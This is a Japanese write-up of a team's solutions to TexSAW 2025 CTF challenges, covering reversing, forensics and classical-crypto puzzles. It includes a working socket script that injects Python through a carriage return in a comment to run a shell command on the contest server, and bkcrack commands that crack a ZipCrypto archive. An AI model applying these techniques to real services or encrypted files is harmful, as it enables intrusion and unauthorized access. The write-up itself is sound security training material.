この大会は2025/4/12 4:00(JST)~2025/4/14 4:00(JST)に開催されました。
今回もチームで参戦。結果は1719点で553チーム中58位でした。
自分で解けた問題をWriteupとして書いておきます。
Welcome
Discordに入り、#rulesチャネルのルールを見ると、フラグが書いてあった。
texsaw{thanks_for_reading_friends}
My Awesome Python Homework Assignment (misc)
コードの指定行にコメントを入れることができる。コメントに改行文字"\r"を含めて指定すると、コードを実行できる。
ls -l /を実行した結果は以下の通り。
total 56 drwxr-xr-x 2 nobody nogroup 4096 Apr 11 09:05 app lrwxrwxrwx 1 nobody nogroup 7 Apr 7 00:00 bin -> usr/bin drwxr-xr-x 2 nobody nogroup 4096 Mar 7 17:30 boot drwxrwxrwt 2 nobody nogroup 100 Apr 11 09:06 dev drwxr-xr-x 31 nobody nogroup 4096 Apr 9 00:31 etc -rw-r--r-- 1 nobody nogroup 30 Apr 11 02:31 flag.txt drwxr-xr-x 2 nobody nogroup 4096 Mar 7 17:30 home lrwxrwxrwx 1 nobody nogroup 7 Apr 7 00:00 lib -> usr/lib lrwxrwxrwx 1 nobody nogroup 9 Apr 7 00:00 lib64 -> usr/lib64 drwxr-xr-x 2 nobody nogroup 4096 Apr 7 00:00 media drwxr-xr-x 2 nobody nogroup 4096 Apr 7 00:00 mnt drwxr-xr-x 2 nobody nogroup 4096 Apr 7 00:00 opt dr-xr-xr-x 237 nobody nogroup 0 Apr 13 02:18 proc drwx------ 2 nobody nogroup 4096 Apr 9 00:19 root drwxr-xr-x 3 nobody nogroup 4096 Apr 7 00:00 run lrwxrwxrwx 1 nobody nogroup 8 Apr 7 00:00 sbin -> usr/sbin drwxr-xr-x 2 nobody nogroup 4096 Apr 7 00:00 srv drwxr-xr-x 2 nobody nogroup 4096 Mar 7 17:30 sys drwxrwxrwt 2 1
cat /flag.txtを実行する。
#!/usr/bin/env python3 import socket def recvuntil(s, tail): data = b'' while True: if tail in data: return data.decode() data += s.recv(1) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('74.207.229.59', 20240)) number = 8 comment = '\rimport os;os.system("cat /flag.txt")' data = recvuntil(s, b'number: ') print(data + str(number)) s.sendall(str(number).encode() + b'\n') data = recvuntil(s, b': ') print(data + comment) s.sendall(comment.encode() + b'\n') data = recvuntil(s, b']: ') print(data + 'N') s.sendall(b'N\n') data = s.recv(1024).decode() print(data)
実行結果は以下の通り。
----------
def isPalindrome(s):
result = True
for i in range(len(s) // 2):
characterOne = s[i]
characterTwo = s[len(s) - 1 - i]
if characterOne != characterTwo:
result = False
return result
wordToCheck = input("Enter a word to check if it's a palindrome: ")
if isPalindrome(wordToCheck):
print("Yes, it's a palindrome!")
else:
print("No, it's not a palindrome.")
----------
line number: 8
import os;os.system("cat /flag.txt")
----------
def isPalindrome(s):
result = True
for i in range(len(s) // 2):
characterOne = s[i]
characterTwo = s[len(s) - 1 - i]
if characterOne != characterTwo:
result = False
return result
import os;os.system("cat /flag.txt")
wordToCheck = input("Enter a word to check if it's a palindrome: ")
if isPalindrome(wordToCheck):
print("Yes, it's a palindrome!")
else:
print("No, it's not a palindrome.")
----------
add more? [y/N]: N
texsaw{i_got_100%,thanks!!1!}
texsaw{i_got_100%,thanks!!1!}
xorer (rev)
Ghidraでデコンパイルする。
int main(void) { char local_30 [32]; undefined1 *local_10; local_10 = &stack0x00000004; printf("Enter password: "); __isoc99_scanf(&DAT_0804a050,local_30); check_password(local_30); return 0; } void check_password(char *input) { uchar key [12]; int len; int i; key[0] = 0xcb; key[1] = 0x95; key[2] = 0xd1; key[3] = 0xfa; key[4] = 0xd1; key[5] = 0xcd; key[6] = 0x96; key[7] = 0xfa; key[8] = 0xc3; key[9] = 0xc9; key[10] = 0x91; key[0xb] = 0xc2; strlen(input); i = 0; while( true ) { if (7 < i) { printf("Correct! Here\'s your flag: texsaw{%s}\n",input); return; } if (((int)input[i] ^ 0xa5U) != (uint)key[i]) break; i = i + 1; } puts("Wrong password!"); return; }
入力文字と0xa5のXORがkeyの各値になるかを8バイト分チェックしている。keyの各値と0xa5をXORしてフラグを求める。
#!/usr/bin/env python3 key = [0xcb, 0x95, 0xd1, 0xfa, 0xd1, 0xcd, 0x96, 0xfa, 0xc3, 0xc9, 0x91, 0xc2] flag = '' for k in key: flag += chr(k ^ 0xa5) flag = 'texsaw{%s}' % flag print(flag)
texsaw{n0t_th3_fl4g}
Too Early 4 Me (rev)
Ghidraでデコンパイルする。
undefined8 main(void) { long in_FS_OFFSET; char local_58 [72]; long local_10; local_10 = *(long *)(in_FS_OFFSET + 0x28); signal(0xe,sigalrm_handler); printf( "Welcome to the TEXSAW sleep survey! To submit your quick and easy one-minute survey, simply answer the following question [y/n]\nDo you feel existential dread when setting your alarm before bed?\n> " ); fgets(local_58,0x40,stdin); if (local_58[0] == 'y') { puts("Exactly. I\'m glad you share my sentiments."); } else { if (local_58[0] != 'n') { printf( "I\'m sorry, I couldn\'t parse that response. You should try not wasting my valuable, pr ecious time moving forward.\nGood day." ); goto LAB_001013a0; } puts("What are you? What are you made of?"); } puts("Your response has been submitted successfully. Thank you for your time."); LAB_001013a0: if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) { /* WARNING: Subroutine does not return */ __stack_chk_fail(); } return 0; } void sigalrm_handler(void) { decode_flag(); return; } void decode_flag(void) { long in_FS_OFFSET; int local_120; uint local_11c; byte abStack_118 [264]; long local_10; local_10 = *(long *)(in_FS_OFFSET + 0x28); for (local_120 = 0; local_120 < 0x100; local_120 = local_120 + 1) { abStack_118[(int)(uint)(byte)sbox[local_120]] = (byte)local_120; } printf("Decoded flag: "); for (local_11c = 0; local_11c < 0x22; local_11c = local_11c + 1) { putchar((uint)abStack_118[(int)(uint)(byte)encoded_flag[(int)local_11c]]); } putchar(10); if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) { /* WARNING: Subroutine does not return */ __stack_chk_fail(); } return; } sbox XREF[3]: Entry Point(*), decode_flag:0010121b(*), decode_flag:00101222(*) 00104060 63 7c 77 undefine 7b f2 6b 6f c5 30 00104060 63 undefined163h [0] XREF[3]: Entry Point(*), decode_flag:0010121b(*), decode_flag:00101222(*) 00104061 7c undefined17Ch [1] 00104062 77 undefined177h [2] 00104063 7b undefined17Bh [3] 00104064 f2 undefined1F2h [4] 00104065 6b undefined16Bh [5] 00104066 6f undefined16Fh [6] 00104067 c5 undefined1C5h [7] 00104068 30 undefined130h [8] 00104069 01 undefined101h [9] 0010406a 67 undefined167h [10] 0010406b 2b undefined12Bh [11] 0010406c fe undefined1FEh [12] 0010406d d7 undefined1D7h [13] 0010406e ab undefined1ABh [14] 0010406f 76 undefined176h [15] 00104070 ca undefined1CAh [16] 00104071 82 undefined182h [17] 00104072 c9 undefined1C9h [18] 00104073 7d undefined17Dh [19] 00104074 fa undefined1FAh [20] 00104075 59 undefined159h [21] 00104076 47 undefined147h [22] 00104077 f0 undefined1F0h [23] 00104078 ad undefined1ADh [24] 00104079 d4 undefined1D4h [25] 0010407a a2 undefined1A2h [26] 0010407b af undefined1AFh [27] 0010407c 9c undefined19Ch [28] 0010407d a8 undefined1A8h [29] 0010407e 51 undefined151h [30] 0010407f a3 undefined1A3h [31] 00104080 40 undefined140h [32] 00104081 8f undefined18Fh [33] 00104082 92 undefined192h [34] 00104083 9d undefined19Dh [35] 00104084 38 undefined138h [36] 00104085 f5 undefined1F5h [37] 00104086 bc undefined1BCh [38] 00104087 b6 undefined1B6h [39] 00104088 da undefined1DAh [40] 00104089 21 undefined121h [41] 0010408a 10 undefined110h [42] 0010408b ff undefined1FFh [43] 0010408c f3 undefined1F3h [44] 0010408d d2 undefined1D2h [45] 0010408e cd undefined1CDh [46] 0010408f 0c undefined10Ch [47] 00104090 13 undefined113h [48] 00104091 ec undefined1ECh [49] 00104092 5f undefined15Fh [50] 00104093 97 undefined197h [51] 00104094 44 undefined144h [52] 00104095 17 undefined117h [53] 00104096 c4 undefined1C4h [54] 00104097 a7 undefined1A7h [55] 00104098 7e undefined17Eh [56] 00104099 3d undefined13Dh [57] 0010409a 64 undefined164h [58] 0010409b 5d undefined15Dh [59] 0010409c 19 undefined119h [60] 0010409d 73 undefined173h [61] 0010409e 60 undefined160h [62] 0010409f 81 undefined181h [63] 001040a0 4f undefined14Fh [64] 001040a1 dc undefined1DCh [65] 001040a2 22 undefined122h [66] 001040a3 2a undefined12Ah [67] 001040a4 90 undefined190h [68] 001040a5 88 undefined188h [69] 001040a6 46 undefined146h [70] 001040a7 ee undefined1EEh [71] 001040a8 b8 undefined1B8h [72] 001040a9 14 undefined114h [73] 001040aa de undefined1DEh [74] 001040ab 5e undefined15Eh [75] 001040ac 0b undefined10Bh [76] 001040ad db undefined1DBh [77] 001040ae e0 undefined1E0h [78] 001040af 32 undefined132h [79] 001040b0 3a undefined13Ah [80] 001040b1 0a undefined10Ah [81] 001040b2 49 undefined149h [82] 001040b3 06 undefined106h [83] 001040b4 24 undefined124h [84] 001040b5 5c undefined15Ch [85] 001040b6 c2 undefined1C2h [86] 001040b7 d3 undefined1D3h [87] 001040b8 ac undefined1ACh [88] 001040b9 62 undefined162h [89] 001040ba 91 undefined191h [90] 001040bb 95 undefined195h [91] 001040bc 0e undefined10Eh [92] 001040bd 61 undefined161h [93] 001040be 35 undefined135h [94] 001040bf 57 undefined157h [95] 001040c0 b9 undefined1B9h [96] 001040c1 86 undefined186h [97] 001040c2 c3 undefined1C3h [98] 001040c3 1c undefined11Ch [99] 001040c4 1d undefined11Dh [100] 001040c5 9e undefined19Eh [101] 001040c6 42 undefined142h [102] 001040c7 68 undefined168h [103] 001040c8 41 undefined141h [104] 001040c9 99 undefined199h [105] 001040ca 2d undefined12Dh [106] 001040cb 0f undefined10Fh [107] 001040cc b0 undefined1B0h [108] 001040cd 54 undefined154h [109] 001040ce bb undefined1BBh [110] 001040cf 16 undefined116h [111] 001040d0 3e undefined13Eh [112] 001040d1 7a undefined17Ah [113] 001040d2 4b undefined14Bh [114] 001040d3 8b undefined18Bh [115] 001040d4 8a undefined18Ah [116] 001040d5 79 undefined179h [117] 001040d6 52 undefined152h [118] 001040d7 7f undefined17Fh [119] 001040d8 5b undefined15Bh [120] 001040d9 8d undefined18Dh [121] 001040da 8c undefined18Ch [122] 001040db 7d undefined17Dh [123] 001040dc 5a undefined15Ah [124] 001040dd 4e undefined14Eh [125] 001040de 4c undefined14Ch [126] 001040df 7e undefined17Eh [127] 001040e0 00 undefined100h [128] 001040e1 00 undefined100h [129] 001040e2 00 undefined100h [130] 001040e3 00 undefined100h [131] 001040e4 00 undefined100h [132] 001040e5 00 undefined100h [133] 001040e6 00 undefined100h [134] 001040e7 00 undefined100h [135] 001040e8 00 undefined100h [136] 001040e9 00 undefined100h [137] 001040ea 00 undefined100h [138] 001040eb 00 undefined100h [139] 001040ec 00 undefined100h [140] 001040ed 00 undefined100h [141] 001040ee 00 undefined100h [142] 001040ef 00 undefined100h [143] 001040f0 00 undefined100h [144] 001040f1 00 undefined100h [145] 001040f2 00 undefined100h [146] 001040f3 00 undefined100h [147] 001040f4 00 undefined100h [148] 001040f5 00 undefined100h [149] 001040f6 00 undefined100h [150] 001040f7 00 undefined100h [151] 001040f8 00 undefined100h [152] 001040f9 00 undefined100h [153] 001040fa 00 undefined100h [154] 001040fb 00 undefined100h [155] 001040fc 00 undefined100h [156] 001040fd 00 undefined100h [157] 001040fe 00 undefined100h [158] 001040ff 00 undefined100h [159] 00104100 00 undefined100h [160] 00104101 00 undefined100h [161] 00104102 00 undefined100h [162] 00104103 00 undefined100h [163] 00104104 00 undefined100h [164] 00104105 00 undefined100h [165] 00104106 00 undefined100h [166] 00104107 00 undefined100h [167] 00104108 00 undefined100h [168] 00104109 00 undefined100h [169] 0010410a 00 undefined100h [170] 0010410b 00 undefined100h [171] 0010410c 00 undefined100h [172] 0010410d 00 undefined100h [173] 0010410e 00 undefined100h [174] 0010410f 00 undefined100h [175] 00104110 00 undefined100h [176] 00104111 00 undefined100h [177] 00104112 00 undefined100h [178] 00104113 00 undefined100h [179] 00104114 00 undefined100h [180] 00104115 00 undefined100h [181] 00104116 00 undefined100h [182] 00104117 00 undefined100h [183] 00104118 00 undefined100h [184] 00104119 00 undefined100h [185] 0010411a 00 undefined100h [186] 0010411b 00 undefined100h [187] 0010411c 00 undefined100h [188] 0010411d 00 undefined100h [189] 0010411e 00 undefined100h [190] 0010411f 00 undefined100h [191] 00104120 00 undefined100h [192] 00104121 00 undefined100h [193] 00104122 00 undefined100h [194] 00104123 00 undefined100h [195] 00104124 00 undefined100h [196] 00104125 00 undefined100h [197] 00104126 00 undefined100h [198] 00104127 00 undefined100h [199] 00104128 00 undefined100h [200] 00104129 00 undefined100h [201] 0010412a 00 undefined100h [202] 0010412b 00 undefined100h [203] 0010412c 00 undefined100h [204] 0010412d 00 undefined100h [205] 0010412e 00 undefined100h [206] 0010412f 00 undefined100h [207] 00104130 00 undefined100h [208] 00104131 00 undefined100h [209] 00104132 00 undefined100h [210] 00104133 00 undefined100h [211] 00104134 00 undefined100h [212] 00104135 00 undefined100h [213] 00104136 00 undefined100h [214] 00104137 00 undefined100h [215] 00104138 00 undefined100h [216] 00104139 00 undefined100h [217] 0010413a 00 undefined100h [218] 0010413b 00 undefined100h [219] 0010413c 00 undefined100h [220] 0010413d 00 undefined100h [221] 0010413e 00 undefined100h [222] 0010413f 00 undefined100h [223] 00104140 00 undefined100h [224] 00104141 00 undefined100h [225] 00104142 00 undefined100h [226] 00104143 00 undefined100h [227] 00104144 00 undefined100h [228] 00104145 00 undefined100h [229] 00104146 00 undefined100h [230] 00104147 00 undefined100h [231] 00104148 00 undefined100h [232] 00104149 00 undefined100h [233] 0010414a 00 undefined100h [234] 0010414b 00 undefined100h [235] 0010414c 00 undefined100h [236] 0010414d 00 undefined100h [237] 0010414e 00 undefined100h [238] 0010414f 00 undefined100h [239] 00104150 00 undefined100h [240] 00104151 00 undefined100h [241] 00104152 00 undefined100h [242] 00104153 00 undefined100h [243] 00104154 00 undefined100h [244] 00104155 00 undefined100h [245] 00104156 00 undefined100h [246] 00104157 00 undefined100h [247] 00104158 00 undefined100h [248] 00104159 00 undefined100h [249] 0010415a 00 undefined100h [250] 0010415b 00 undefined100h [251] 0010415c 00 undefined100h [252] 0010415d 00 undefined100h [253] 0010415e 00 undefined100h [254] 0010415f 00 undefined100h [255] encoded_flag XREF[3]: Entry Point(*), decode_flag:00101273(*), decode_flag:0010127a(*) 00104020 8a 9e 5b undefine 8b 86 7f 7d 41 16 00104020 8a undefined18Ah [0] XREF[3]: Entry Point(*), decode_flag:00101273(*), decode_flag:0010127a(*) 00104021 9e undefined19Eh [1] 00104022 5b undefined15Bh [2] 00104023 8b undefined18Bh [3] 00104024 86 undefined186h [4] 00104025 7f undefined17Fh [5] 00104026 7d undefined17Dh [6] 00104027 41 undefined141h [7] 00104028 16 undefined116h [8] 00104029 7f undefined17Fh [9] 0010402a 57 undefined157h [10] 0010402b 8b undefined18Bh [11] 0010402c 99 undefined199h [12] 0010402d 68 undefined168h [13] 0010402e bb undefined1BBh [14] 0010402f 86 undefined186h [15] 00104030 b0 undefined1B0h [16] 00104031 99 undefined199h [17] 00104032 1c undefined11Ch [18] 00104033 99 undefined199h [19] 00104034 16 undefined116h [20] 00104035 79 undefined179h [21] 00104036 8b undefined18Bh [22] 00104037 57 undefined157h [23] 00104038 54 undefined154h [24] 00104039 79 undefined179h [25] 0010403a 1c undefined11Ch [26] 0010403b 41 undefined141h [27] 0010403c 57 undefined157h [28] 0010403d 8b undefined18Bh [29] 0010403e 7f undefined17Fh [30] 0010403f 86 undefined186h [31] 00104040 68 undefined168h [32] 00104041 4e undefined14Eh [33]
decode_flag関数と同様の処理を実行し、フラグを取得する。
#!/usr/bin/env python3 sbox = [0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76, 0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA8, 0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2, 0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73, 0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB, 0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC3, 0x1C, 0x1D, 0x9E, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16, 0x3E, 0x7A, 0x4B, 0x8B, 0x8A, 0x79, 0x52, 0x7F, 0x5B, 0x8D, 0x8C, 0x7D, 0x5A, 0x4E, 0x4C, 0x7E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00] encoded_flag = [0x8A, 0x9E, 0x5B, 0x8B, 0x86, 0x7F, 0x7D, 0x41, 0x16, 0x7F, 0x57, 0x8B, 0x99, 0x68, 0xBB, 0x86, 0xB0, 0x99, 0x1C, 0x99, 0x16, 0x79, 0x8B, 0x57, 0x54, 0x79, 0x1C, 0x41, 0x57, 0x8B, 0x7F, 0x86, 0x68, 0x4E] stack = [0] * 264 for i in range(256): stack[sbox[i]] = i flag = '' for i in range(34): flag += chr(stack[encoded_flag[i]]) print(flag)
texsaw{how_signalicious_much_swag}
Freaky Flower (Forensics)
psdファイルをhttps://www.photopea.com/で開く。テキストレイヤーとして以下の名称が設定されている。
sneaky_sunflowers_sure_suck
texsaw{sneaky_sunflowers_sure_suck}
Favorite Flower (Forensics)
画像をよく見ると、ひまわりの花の下にRingmasterと書いてある。
texsaw{ringmaster}
Hidden beneath the wavs (Forensics)
$ zipinfo secret_note.zip Archive: secret_note.zip Zip file size: 192762 bytes, number of entries: 1 -rw-r--r-- 3.0 unx 192566 BX stor 25-Mar-29 09:25 aaaac.wav 1 file, 192566 bytes uncompressed, 192566 bytes compressed: 0.0%
無圧縮で、7-Zip File Managerで見ると、圧縮方式がZipCrypto Storeになっている。
wavファイルはファイルサイズがわかれば、先頭24バイトがわかる。
先頭24バイトは以下のような形式になる。
RIFF<ファイルサイズ-8のリトルエンディアン文字列(4バイト)>WAVEfmt<space>\x10\x00\x00\x00\x01\x00\x01\x00
このことを使って、bkcrackで既知平文攻撃ができそう。
>>> (192566 - 8).to_bytes(4, 'little').hex() '2ef00200'
$ echo 524946462ef0020057415645666d74201000000001000100 | xxd -r -p > plain_head $ ./bkcrack -C secret_note.zip -c aaaac.wav -p plain_head bkcrack 1.5.0 - 2022-07-07 [08:18:38] Z reduction using 17 bytes of known plaintext 100.0 % (17 / 17) [08:18:38] Attack on 437542 Z values at index 6 Keys: f93bbe2a 0da8b6e7 2ae51dac 73.8 % (322734 / 437542) [08:25:50] Keys f93bbe2a 0da8b6e7 2ae51dac
内部の鍵が得られるので、それを使って、aaaac.wavを復号する。
$ ./bkcrack -C secret_note.zip -c aaaac.wav -k f93bbe2a 0da8b6e7 2ae51dac -d aaaac.wav bkcrack 1.5.0 - 2022-07-07 [08:29:48] Writing deciphered data aaaac.wav (maybe compressed) Wrote deciphered data. $ exiftool aaaac.wav ExifTool Version Number : 13.00 File Name : aaaac.wav Directory : . File Size : 193 kB File Modification Date/Time : 2025:04:13 08:29:48+09:00 File Access Date/Time : 2025:04:13 08:30:55+09:00 File Inode Change Date/Time : 2025:04:13 08:29:48+09:00 File Permissions : -rwxrwxrwx File Type : WAV File Type Extension : wav MIME Type : audio/x-wav Encoding : Microsoft PCM Num Channels : 1 Sample Rate : 32880 Avg Bytes Per Sec : 65760 Bits Per Sample : 16 Comment : TexSAW{Th3_s1l3nce_SH4ll_l3ad_TH3_W4y} Duration : 2.93 s
TexSAW{Th3_s1l3nce_SH4ll_l3ad_TH3_W4y}
Scrambled Packets (Forensics)
icmpでフィルタリングして、1バイトのdataが付いているものだけ見ると、フラグの断片があるように見える。ただその順番は時系列に並んでいなさそうだが、Sequence Numberの順に並べれば、フラグになりそう。
#!/usr/bin/env python3 from scapy.all import * packets = rdpcap('cap.pcap') flag = [b''] * 24 for p in packets: if p.haslayer(ICMP) and p.haslayer(Raw): if p[IP].src == '147.182.177.196' and len(p[Raw].load) == 1: char = p[Raw].load index = p[ICMP].seq flag[index] = char flag = b''.join(flag).decode() print(flag)
TexSAW{not_the_fake_one}
who-made-this-anyway (Crypto)
問題文にあるGiovan Battista Bellaso polyalphabetic substitution cipherで検索すると、Vigenere cipherが見つかる。
https://www.dcode.fr/vigenere-cipherで復号すると、鍵が以下の場合に復号できた。
SAWTEX
復号結果は以下の通り。
OMGHEYYOUFIGUREDOUTTHECIPHERTHEKEYWASNTTOOHARDTOFINDWASITYOUSHOULDBEVERYPROUDOFYOURSELFALLYOUHADTODOWASUSETHEKASISKITESTTOFINDTHELENGTHOFTHEKEYTHENDIVIDETHEMESSAGEINTOSEGMENTSOFTHEKEYSIZETHENUSEALITTLEBITOFFREQUENCYANALYSISTOFINDTHEKEYONCEYOUHAVETHEKEYITSPRETTYSIMPLEIDONTREALLYNEEDTOTELLYOUTHATTHOUGHSINCEYOUREALREADYHEREANYWAYISUPPOSEYOUAREHERETOFINDTHEFLAGWELLIWILLTELLYOUWHATTHEFLAGISTHEFLAGISOMGHEYYOUFOUNDME
この文章からフラグ部分を抜き出す。
texsaw{OMGHEYYOUFOUNDME}
key-reuse (Crypto)
同じ鍵で2つの平文がXORされている。https://github.com/SpiderLabs/cribdragのツール(Python2)を使って、推測しながら復号する。まず2つの暗号をXORする。
$ python2 xorstrings.py 200d1d2014071e152b1c1e022d2615100617112a0804 20000035191102062C1016091334110B1703182A020D 000d1d150d161c13070c080b3e12041b111409000a09 $ python2 cribdrag.py 000d1d150d161c13070c080b3e12041b111409000a09 Your message is currently: 0 ______________________ Your key is currently: 0 ______________________ Please enter your crib: texsaw{ *** 0: "theflag" 1: "yxm~wkh" 2: "ipue}d|" *** 3: "ahnorpw" 4: "ysd`f{s" 5: "byktmp" 6: "hvi|E" 7: "gbt{jIi" 8: "sipx_e" 9: "xmsMss`" 10: "|nFaelj" 11: "[jwzfo" 12: "Jw|hpcr" 13: "facbu~{" 14: "p~ighwq" 15: "otlza}r" Enter the correct position, 'none' for no match, or 'end' to quit: 0 Is this crib part of the message or key? Please enter 'message' or 'key': key Your message is currently: 0 theflag_______________ Your key is currently: 0 texsaw{_______________
ここまで来て推測が難しくなってきたので、鍵の文字列も確認する。
>>> from Crypto.Util.strxor import strxor
>>> c1 = bytes.fromhex('200d1d2014071e152b1c1e022d2615100617112a0804')
>>> c2 = bytes.fromhex('20000035191102062C1016091334110B1703182A020D')
>>> m1 = b'texsaw{'
>>> m2 = b'theflag'
>>> strxor(c1[:7], m1)
b'TheSupe'
>>> strxor(b'TheSuper', c1[:8])
b'texsaw{g'Please enter your crib: g
*** 0: "g"
*** 1: "j"
*** 2: "z"
*** 3: "r"
*** 4: "j"
*** 5: "q"
6: "{"
*** 7: "t"
8: "`"
*** 9: "k"
*** 10: "o"
*** 11: "l"
*** 12: "Y"
*** 13: "u"
*** 14: "c"
15: "|"
*** 16: "v"
*** 17: "s"
*** 18: "n"
*** 19: "g"
*** 20: "m"
*** 21: "n"
Enter the correct position, 'none' for no match, or 'end' to quit: 7
Is this crib part of the message or key? Please enter 'message' or 'key': key
Your message is currently:
0 theflagt______________
Your key is currently:
0 texsaw{g______________
Please enter your crib: going
0: "gbt{j"
1: "jr|cq"
2: "zzdx{"
3: "rbrt"
4: "jyu}`"
*** 5: "qszik"
6: "{|nbo"
*** 7: "thefl"
8: "`caeY"
*** 9: "kgbPu"
10: "odW|c"
11: "lQ{j|"
12: "Y}muv"
13: "ukrs"
*** 14: "ctxzn"
15: "|~}gg"
16: "v{`nm"
*** 17: "sfidn"
Enter the correct position, 'none' for no match, or 'end' to quit: 7
Is this crib part of the message or key? Please enter 'message' or 'key': key
Your message is currently:
0 theflagthefl__________
Your key is currently:
0 texsaw{going__________
Please enter your crib: flag
0: "fa|r"
*** 1: "kqtj"
2: "{ylq"
3: "saw{"
4: "kz}t"
5: "ppr`"
6: "zfk"
*** 7: "ukmo"
8: "a`il"
*** 9: "jdjY"
10: "ng_u"
*** 11: "mRsc"
12: "X~e|"
*** 13: "thzv"
*** 14: "bwps"
15: "}}un"
*** 16: "wxhg"
*** 17: "ream"
*** 18: "olkn"
Enter the correct position, 'none' for no match, or 'end' to quit: 10
Is this crib part of the message or key? Please enter 'message' or 'key': message
Your message is currently:
0 theflagtheflag________
Your key is currently:
0 texsaw{going_u________
Please enter your crib: theflagt
0: "texsaw{g"
1: "yupkz}ts"
2: "i}hppr`x"
3: "aeszfk|"
4: "y~yukmo"
5: "btva`ilJ"
6: "h{bjdjYf"
7: "going_up"
*** 8: "sdmmRsco"
9: "x`nX~e|e"
10: "|c[thzv`"
11: "Vwbwps}"
12: "Jza}}unt"
13: "fl~wxhg~"
14: "pstream}"
Enter the correct position, 'none' for no match, or 'end' to quit: 14
Is this crib part of the message or key? Please enter 'message' or 'key': message
Your message is currently:
0 theflagtheflagtheflagt
Your key is currently:
0 texsaw{going_upstream}
texsaw{going_upstream}
Venona (Crypto)
暗号文は以下の3つがある。
RCPZURNPAQELEPJUJZEGAMVMXWVWCTBMHKNYEEAZVXQWVKGMRVWXDLCANHLGY FLPDBSBQIGBJECHMIOZGJMQONXJANFPQYQPWIIONYKNERKHIABLJTPTAOZMDGZUTAESK KDPRMZZKNBECTGTKMKQOWXKCHMVNDOPQXUWJJLECUCLBQKKVDXJNUEYFIDAGVIUG
平文は2つあり、それぞれスペースを削除すると、以下のようになる。
OPERATIONBLUEEAGLEMOVINGTOSECTORFOURSTOPREQUESTEXTRACTIONATBLUEEAGLE AGENTSUNFLOWERCOMPROMISEDNEARHANOISTOPABORTMISSIONCOMPROMISED
文字列の長さから平文と暗号文は以下の組み合わせになっていると推測できる。
平文1 : OPERATIONBLUEEAGLEMOVINGTOSECTORFOURSTOPREQUESTEXTRACTIONATBLUEEAGLE 暗号文1: FLPDBSBQIGBJECHMIOZGJMQONXJANFPQYQPWIIONYKNERKHIABLJTPTAOZMDGZUTAESK 平文2 : AGENTSUNFLOWERCOMPROMISEDNEARHANOISTOPABORTMISSIONCOMPROMISED 暗号文2: RCPZURNPAQELEPJUJZEGAMVMXWVWCTBMHKNYEEAZVXQWVKGMRVWXDLCANHLGY
DIANA.tiffの画像を見ると、アルファベットが逆順になっているが、Vigenere暗号の対応表のようになっている。
https://www.dcode.fr/vigenere-cipherでALPHABETに以下を指定する。
ZYXWVUTSRQPONMLKJIHGFEDCBA
鍵は以下であることがわかる。
QVKLAYSBUEPOZXGFWJMRNDCHTIQVKLAYSBUEPOZXGFWJMRNDCHTIQVKLAYSBUEPOZXGF
これを元に以下を復号する。
KDPRMZZKNBECTGTKMKQOWXKCHMVNDOPQXUWJJLECUCLBQKKVDXJNUEYFIDAGVIUG
復号結果は以下の通り。
THEFLAGISWONTIMEPADWITHUNDERSCORESBETWEENWORDSWRAPPEDINTHEHEADER
この文の内容からフラグを生成する。
texsaw{WON_TIME_PAD}
